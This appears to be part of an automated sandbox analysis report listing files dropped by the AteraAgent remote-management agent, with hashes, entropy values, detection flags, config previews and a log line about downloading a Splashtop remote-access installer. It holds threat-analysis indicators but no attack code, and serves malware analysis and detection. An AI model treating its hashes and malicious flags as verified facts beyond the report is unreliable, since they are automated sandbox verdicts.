                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):97328
                                                                                                                                                                                                                                        Entropy (8bit):6.2419469146373485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:3NSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxQ:3N3OWMsQ56vd2s+KuYc9RTJa
                                                                                                                                                                                                                                        MD5:9F59EFE4EE7BFF13F5866311048A6A80
                                                                                                                                                                                                                                        SHA1:1F20929EE2BCC0BE40848CC739C6F31CAD13DA69
                                                                                                                                                                                                                                        SHA-256:32FB947BAD722480938922DC363DB76AB0079383C6D732B4998C302B03D87200
                                                                                                                                                                                                                                        SHA-512:CCCAAF2396AD1307AF0B51B424005BFB350508059CD9CF3E9641D396CCA3EC4C22EFB0329DF0AFD0B3888E07559B6904A0361B85A80A527CD3139161CFF91DAA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.17954530016547
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:G3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnO:U0qjCSRE+fw0kG719
                                                                                                                                                                                                                                        MD5:6D055BBD0463057997B216FA41FC1BAA
                                                                                                                                                                                                                                        SHA1:0E3B5685453BFE674252EEFE7B29DDFFE3394F36
                                                                                                                                                                                                                                        SHA-256:94571C1156471E113A0BA58686D0E0F8C8A18B7F5415A17CC00688D6901D6DD6
                                                                                                                                                                                                                                        SHA-512:D3D1FB3588D4AE7279244086069DEF2145FDD341099BD66B801CE1F7EB18F4F68B0043D3CF4BA5C8FA3FA680EF228C3371743AF1E9DCAA64711321EC6A94FCEC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.673983708245621
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Oh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBhKr+:Oy9eEpYinAMxCAcr+
                                                                                                                                                                                                                                        MD5:351EE6E0FBE6951D43F195DBFD34911A
                                                                                                                                                                                                                                        SHA1:2FAAD5BD1D08D9791C941F6F01BA41473C12DD1F
                                                                                                                                                                                                                                        SHA-256:8B4AF4380F5083A9DC11F5E74FEA942A34DE4AA3740EE0DBCEF92A95AFD656F6
                                                                                                                                                                                                                                        SHA-512:00A0600E0E4541058B8FF5A7314E0C2779B5BA5E3F9FBE9F15556E84D84D8B3C0317116B29A832CB038457EF6CE1FA88149C18E7DD33D27A3ADD3AFFAC5FF9D7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):342865
                                                                                                                                                                                                                                        Entropy (8bit):7.9992844075056935
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):74288
                                                                                                                                                                                                                                        Entropy (8bit):5.498724993681897
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):541
                                                                                                                                                                                                                                        Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=23.4
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96816
                                                                                                                                                                                                                                        Entropy (8bit):6.180256382950937
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960782910515381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                        Entropy (8bit):4.967149133128097
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{"DownloadedAt":"2024-10-04T14:29:18.4770287-04:00","Hash":"8TVvf703UCtSnZvNZD+3qw=="}
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):88
                                                                                                                                                                                                                                        Entropy (8bit):4.907414261987695
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:APgXzQfUbKSoE6LGKWqKRLXsmfWoVUgXAQJ:AP5UdZlKWqKRLX/qK
                                                                                                                                                                                                                                        MD5:2486139DE82BF7BF94E4FD428191FF51
                                                                                                                                                                                                                                        SHA1:7D91EE878A89FCB2FE4F1C542CFB9B16C862F097
                                                                                                                                                                                                                                        SHA-256:59731FAB643F8E544C519622E855FB5A9A4AEEEA3FC304DE5C1DAE153E6E217A
                                                                                                                                                                                                                                        SHA-512:89BBFA8E15B46D0E2FC7F454A0FDAEB366F6ACF83DA0A5802F426759D30B6A77483DFB2D2EAFA8FC1556C3E5D6E12CC603F0530F71A14E1B1DDCF7566657B590
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..02/10/2024 11:19:51 Downloading installation to: C:\Windows\TEMP\SplashtopStreamer.exe
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):637958
                                                                                                                                                                                                                                        Entropy (8bit):7.999354686674398
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:HVd5b8dhfpvZ3U9ygocoFAdF4r0el92pBW/wFIlzxDFBLXJ:HFbyhfVsySoKdF6D2pswmlpXd
                                                                                                                                                                                                                                        MD5:767D5DD4AD2D6A3E0FF3E45DB47A9657
                                                                                                                                                                                                                                        SHA1:982A2AF2C94AE33CFB240A30A1C6433E5E5689DF
                                                                                                                                                                                                                                        SHA-256:156218F309CAF003096CB28C2FFCD74A0989E4FD0207E485A3292A4D8D1C48ED
                                                                                                                                                                                                                                        SHA-512:E8104B3622BF07059131F3F0A8DC9EA44C7B0E32213F534AEAE229F000B01425B72955197DC776F1B5750FAE2BEAAE888A2EA1D62B1630D3FC5D79B4C57317D2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51248
                                                                                                                                                                                                                                        Entropy (8bit):6.297269575035048
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:MNb66jeKAdzF2a11sxKN/NEQDg8vM2j7HxqW:MQ6jeKAd5b1S2/NPBU2jR
                                                                                                                                                                                                                                        MD5:26E9CCE4BD85A1FCACBF03A8C3F3DDCA
                                                                                                                                                                                                                                        SHA1:3F78C454CC72D4C5B2A0F295530391904EC87948
                                                                                                                                                                                                                                        SHA-256:50F399A3867DEAB18530F8F3E72D489A15F62D6E250F4F795C7BB735F9522899
                                                                                                                                                                                                                                        SHA-512:D57C6A799C01A3F67AFB3DDEDDDBD49ECFC17C2347BEC24ED85207A846547F6288D2023961EDCAB67DFC512E0B1DA187C475A7D01BB1005A61D337EC4FEA0FE0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):973
                                                                                                                                                                                                                                        Entropy (8bit):5.01886272205883
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsVPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3s77O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                        MD5:3CCA9B00717A374829CA50C82C1E70CF
                                                                                                                                                                                                                                        SHA1:357729D1CBFA36318D8A91BDC8C039E254A7CAA2
                                                                                                                                                                                                                                        SHA-256:4161C6070CDBCB94718A6E76931AE38CABEBB70E5B00C55E799E72E61F0ECAEC
                                                                                                                                                                                                                                        SHA-512:C172CF13115FC724799C50218F00A1055FA84DEC6B9FA28F7C981DE94D4DE64CDC7797E903D4E8B87CA2FAC535B62EB395E372656183C75F42E7086598C3C435
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />.....</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXTLd:WBTp
                                                                                                                                                                                                                                        MD5:B1DE0EF19266A86B8F7A2BCD03ECD23B
                                                                                                                                                                                                                                        SHA1:AB91C344BFECEF0CDB73119D4C5C72BAA8CD21E7
                                                                                                                                                                                                                                        SHA-256:50578EB887B529FB77AFAA4F3A888ECA57E2D640F4789BBEE470F1EFF04DEB7F
                                                                                                                                                                                                                                        SHA-512:656C69FF2C62F2704AC409AA3B04CB78B9767FE908BD0BE4C6977A469B68D7C5F83B786EE915BECF5244E70892A48A92B9D0CA9A767EA329B63A6EAD98F9F274
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=26.8
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102448
                                                                                                                                                                                                                                        Entropy (8bit):6.190977882973481
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:VPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87Hxo:V2bYbYSWd85I5sSakFQhHL8i
                                                                                                                                                                                                                                        MD5:6C0E7E9151E242E401EEBBC13558E3F5
                                                                                                                                                                                                                                        SHA1:9A5963712AD9E0F336A4749E7C258A67EF6260FA
                                                                                                                                                                                                                                        SHA-256:77D6B8CB94B6CF5B399704C3CD5877211D99FCCA58F94D120998FC41185D0E0F
                                                                                                                                                                                                                                        SHA-512:02E5E5FA52BDA5CFF5181196C6A62913FA87D6675CBA27FBFF3D0C50F305BA4CF8D9D8C4016EDC90AB1513BA39D89B50566BFF4D05585583EF03B8AA17BEA793
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.857474166817892
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:w9c52LPirPW94/DNyb8E9VF6IYinAM+oCOX3lq:w9cym2KEpYinAMxCg3c
                                                                                                                                                                                                                                        MD5:E1AA9E74F8E36783187BA548C26A1D95
                                                                                                                                                                                                                                        SHA1:52FD9D58877986DCDDBDC5C1DAC6825C5720A4F1
                                                                                                                                                                                                                                        SHA-256:CE46D831129B265740E521A614DE1F2BEE211F350FFC9643407C75308E1DBE06
                                                                                                                                                                                                                                        SHA-512:B2D79FD01D4D0BC3CCFFCD62ADD4BC45BB25561892CD23299163EDA10896249F53FD966015B7655C209B33EE413C10565D51861298061E3886B43E77E59ABDB2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):542
                                                                                                                                                                                                                                        Entropy (8bit):5.041389931890446
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGGsVZrdSJ9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdArdEtPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:547C772B1DEA0A1E8030F6ED5BE2AF75
                                                                                                                                                                                                                                        SHA1:6F4A95B2EA3342D7B4D61C715C7FC076EB6A2DC0
                                                                                                                                                                                                                                        SHA-256:C35A8B8AF7ECCB9BA68B129FF7F46EB1279229D637049F40761A697E9DFCD5A4
                                                                                                                                                                                                                                        SHA-512:0F77B35AC34C8E4655F7F1F4EBF1A86AA11F96C689E632DA8BE8A17CC69A9292878E0058DD9EA5FF7315DCDD8B34489F06E6DCBB365569E3BB80E81373792FC0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398896
                                                                                                                                                                                                                                        Entropy (8bit):6.134467211026903
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:WjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvH:W+e55LgIkTmyAAfTnMLvH
                                                                                                                                                                                                                                        MD5:6C03B5CEC0E3BFF6410B020CAC7EC662
                                                                                                                                                                                                                                        SHA1:DE5C6B33A97BBF0B3063CF44DACE307FEB968BF6
                                                                                                                                                                                                                                        SHA-256:05C2739F2AFA9A05514CD75C12BE6C0CD73A8356A28B3FAF84140FEEE416F339
                                                                                                                                                                                                                                        SHA-512:06900ACBA446F813E8181E42A0713B5BBD568068960DD0620C4EDF0F3C096E4C8B409181AC8FC51A24F638E37F908B6212E22DB3799107B51578B6853A8E60C0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960755198774021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:eBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUj:eBjk38WuBcAbwoA/BkjSHXP36RMGi
                                                                                                                                                                                                                                        MD5:FA365D16F9EB02769CE0ACF75C31C832
                                                                                                                                                                                                                                        SHA1:F83D3F502E92DAD01574D16FDE5E7CA81C53A5DB
                                                                                                                                                                                                                                        SHA-256:63A690F6523922CB55B065764ABA61BE69F11AA93C8437C01485BCC4AC182F46
                                                                                                                                                                                                                                        SHA-512:E26E077C0C5806B3D4E1ABBB06087D08921CF6A46FA700343AA373213180BF9EABD7822CE418E24973909A515BA5B73DD0902402020E5A4AC56D387E378C4AD8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18480
                                                                                                                                                                                                                                        Entropy (8bit):6.708180254980656
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:1qPstMu7M72kNyb8E9VF6IYinAM+oCiSFDKJup:1vMuo7/EpYinAMxCbeup
                                                                                                                                                                                                                                        MD5:C9A5D57AF074418532A591B4443AD16F
                                                                                                                                                                                                                                        SHA1:4F99922845AF05C64B36BC71FD34468683B389D6
                                                                                                                                                                                                                                        SHA-256:322D41E1890A28359ED05AC7C3973C2CA3532CB77F8D0646B982A76FE0A68EE0
                                                                                                                                                                                                                                        SHA-512:461CCFF9F349E6F8BE27F50C54464CA65AEC23DF6C4DEFB5A4AB085F8239899CE88B2C0B2764020807826C92BB2F757DCF39733721595E80C2AAA5A75718D9B7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):500
                                                                                                                                                                                                                                        Entropy (8bit):5.044946190927216
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGp2VOD9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsHPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:5EF8C402347FEC5555700DB9D649C349
                                                                                                                                                                                                                                        SHA1:2E70D02943060011AF38D9200B3461206F56933D
                                                                                                                                                                                                                                        SHA-256:718459DA91EB82BD0ED8AD24CC3EABFCA61D1B5C1D9060111F85CC7D84BADCCA
                                                                                                                                                                                                                                        SHA-512:F2650D2C604459E674810BDA95C37D3FE7747CF67B5736C4275DA91576B36F3FF882FD3F8A5F0591CDF335E935DB716BE827821333297F719C26B1152BCB4D6F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>.. <supportedRuntime version="v4.0" />.....</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.676917265704932
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqpodH3T:tuhMaVmzDC67EpYinAMxCWH3T
                                                                                                                                                                                                                                        MD5:F2016790A63364276B5DE090FF0D9516
                                                                                                                                                                                                                                        SHA1:C99BDCCD05A8813E6DEECCDFA0FD675FDC57A488
                                                                                                                                                                                                                                        SHA-256:662DC69A05611BEA25F993F4D249C83340C2F468E9564CA625027A1EA9C84E9A
                                                                                                                                                                                                                                        SHA-512:41CBB8D586AEACC6E9C156561A4C92EF30C3D50B8D4A91C2A0A41E186891C61776E102AC5DEB95A854C2241734A854320B49A0E0A05F20ECBCDB8A0F7E55980E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64048
                                                                                                                                                                                                                                        Entropy (8bit):6.268502105017609
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:BYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1JEpYinAMxC7z1:BKC9niwOepJ6TJPeb6NIUy7HxUz1
                                                                                                                                                                                                                                        MD5:9B1EA8A460CDBE957FD464E52CB74F9C
                                                                                                                                                                                                                                        SHA1:34574DE2F45BDA8A68F49C031A80476D6E6B711F
                                                                                                                                                                                                                                        SHA-256:41046ADC0E23A6A673C6DDD890C4B43F21A615D470886D59FC436B09B994E7A8
                                                                                                                                                                                                                                        SHA-512:A99E6C7829C4B6994E8AFDB4538DD8954DCFF96F2C59D62FFC91DA2E833F777F870A2F55A60CADBBED97ABA0F6411D6D40DE33D295491B2AEB45CDC51D485003
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.17978189203311
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:2P3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IlU:2h0qjC5RMOHO420kN1P
                                                                                                                                                                                                                                        MD5:8D61BFC6E305850F082B2A4FAED267B8
                                                                                                                                                                                                                                        SHA1:543224920E68C0C7B28C9411ECE8B9F8EAFA7DE3
                                                                                                                                                                                                                                        SHA-256:B7EF8E721E39ACE9C8C4B4C4490AE5042634637D24DB4A70AF33D29DC4EC5C10
                                                                                                                                                                                                                                        SHA-512:6AA0C22B6CBD1942AD74386919D8E4F0F69FF47FC97103BDAD3FE029E9137C51DAC70CDB84275AE779965E461BC992DE96028B92A3DB8F0D26B8B53A547CA09E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.63676850357766
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:7TO9dQWXYW8aVNyb8E9VF6IYinAM+oCJF08IoP:7Cn6CEpYinAMxCk8jP
                                                                                                                                                                                                                                        MD5:F6E07CB084C3B287E2D2525A597A4D0C
                                                                                                                                                                                                                                        SHA1:E9191698963EA0613747BC24842DF8C37E6FBE84
